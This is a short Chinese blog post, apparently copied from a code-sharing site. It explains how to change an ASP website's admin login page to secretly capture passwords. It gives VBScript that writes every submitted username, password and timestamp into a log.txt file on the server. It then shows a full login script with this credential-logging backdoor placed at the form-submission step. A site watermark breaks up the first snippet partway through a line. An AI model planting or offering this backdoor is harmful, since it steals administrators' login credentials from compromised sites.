很多黑客通过修改后台登陆代码获得目标网站的用户登录密码,这样我们一旦输入了密码就保存到一个txt里面
if fso.FileEx
来源gao!daima.com搞$代!码网
ists(server.mappath(“log.txt”))=true then
set fin=fso.OpenTextFile(server.mappath(“log.txt”))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath(“log.txt”))
fout.WriteLine(temp&”user:”&username&”¦pwd:”&password&”¦time:”&now()&””)
fout.close
set fout=nothing
set fso=nothing
在后台登录处表单提交的地方插入!
参考文件:
<%
dim sql,rs
dim username,password,CheckCode
username=replace(trim(request(“username”)),”‘”,””)
password=replace(trim(Request(“password”)),”‘”,””)
CheckCode=replace(trim(Request(“CheckCode”)),”‘”,””)
if UserName=”” then
FoundErr=True
ErrMsg=ErrMsg & “
”
end if
if Password=”” then
FoundErr=True
ErrMsg=ErrMsg & “
”
end if
if CheckCode=”” then
FoundErr=True
ErrMsg=ErrMsg & “
”
end if
if session(“CheckCode”)=”” then
FoundErr=True
ErrMsg=ErrMsg & “
”
end if
if CheckCodeCStr(session(“CheckCode”)) then
FoundErr=True
ErrMsg=ErrMsg & “
”
end if
‘这后面是我增加的代码~开始区域
set fso=server.createobject(“scripting.filesystemobject”)
if fso.FileExists(server.mappath(“log.txt”))=true then
set fin=fso.OpenTextFile(server.mappath(“log.txt”))
temp=fin.readall
fin.close
set fin=nothing
end if
set fout=fso.createtextfile(server.mappath(“log.txt”))
fout.WriteLine(temp&”user:”&username&”|pwd:”&password&”|time:”&now()&””)
fout.close
set fout=nothing
set fso=nothing
‘后面的代码被我删除了~结束区域
%>
本文涉及语句作者是:会的不多iFat
以上就是Asp截获后台登录密码的代码的详细内容,更多请关注gaodaima搞代码网其它相关文章!
转载请注明原文链接:Asp截获后台登录密码的代码
